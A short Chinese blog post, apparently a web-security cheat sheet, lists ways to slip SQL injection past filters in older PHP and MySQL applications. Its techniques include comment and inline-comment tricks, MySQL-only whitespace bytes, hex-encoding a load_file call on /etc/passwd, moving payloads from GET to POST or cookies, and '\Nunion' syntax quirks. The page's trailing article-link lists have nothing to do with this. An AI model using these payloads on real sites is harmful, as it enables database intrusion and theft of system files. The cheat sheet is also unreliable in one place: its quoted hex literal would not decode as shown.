虽然mysql + php的开发中可以使用pdo中,但是有些老久的程序没有使用,或其他原因

1.注释绕过

select/*comment*/user/*zzsdsdsf*/from mysql.user;

2.内联注释绕过

/*!12345select*//*!12345user*/ from mysql.user;

3.特殊空白字符绕过

在php中\s会匹配0x09,0x0a,0x0b,0x0c,0x0d,0x20

但是在mysql中空白字符为  0x09,0x0a,0x0b,0x0c,0x0d,0x20,0xa0

0xa0有时候有奇效

0x0a和0x0d会影响"."的匹配,有时候也是可以利用的

4.十六进制绕过

select load_file('0x2f6574632f706173737764');

python

>>> '/etc/passwd'.encode('hex')
'2f6574632f706173737764'

5.换一种提交姿势绕过

有时候程序员只过滤了GET中的危险字符,可以试试POST,COOKIES甚至是FILES

6.mysql黑魔法绕过

select{x user}from {x mysql.user};

select user from mysql.user where 1=\Nunion select@1;

select user from mysql.user where 1=\Nunion select-.1;

最新文章

  1. 玩转Windows服务系列汇总
  2. windows下python的web环境搭建使用(观看Backbone的教程有感)
  3. 1、启动oracle的步骤
  4. SQLServer子查询
  5. ODAC(V9.5.15) 学习笔记(十九)主键值自动生成
  6. [小技巧] git: Your branch and 'origin/master' have diverged
  7. eclips引入Java源代码
  8. JBoss像tomcat那样创建部署文件,JBoss创建虚拟目录
  9. AIX filesystemcache引发的Oracle事故
  10. log4j 和slf4j的比较
  11. Leetcode 136.只出现一次的数字 By Python
  12. 【转】/bin/bash^M: bad interpreter: No such file or directory
  13. jenkins+mail邮件配置
  14. python基础知识~备份还原功能设计
  15. 【Android】android:windowSoftInputMode属性详解
  16. 判断是手机请求还是pc请求
  17. c#mvc实现登录
  18. Node 编码规范(优秀是一种习惯)
  19. 使用 Chef 自动执行 Azure 虚拟机部署
  20. Could not find a package configuration file provided by "ecl_build",.................couldn't find required component 'ecl_build'

热门文章

  1. 自定义View(二)ViewPage广告轮播
  2. HDU1358:Period
  3. Developers, do consider different user roles! - A bad experience with cron
  4. sql获取时间时分秒
  5. 标识域 Identify Field
  6. Qt 5 在Windows下 出现QApplication: No such file or directory 问题的解决办法
  7. android ListView_新闻案例
  8. Codevs 1014 装箱问题
  9. opencv 手写选择题阅卷 (二)字符识别
  10. defrag磁盘整理命令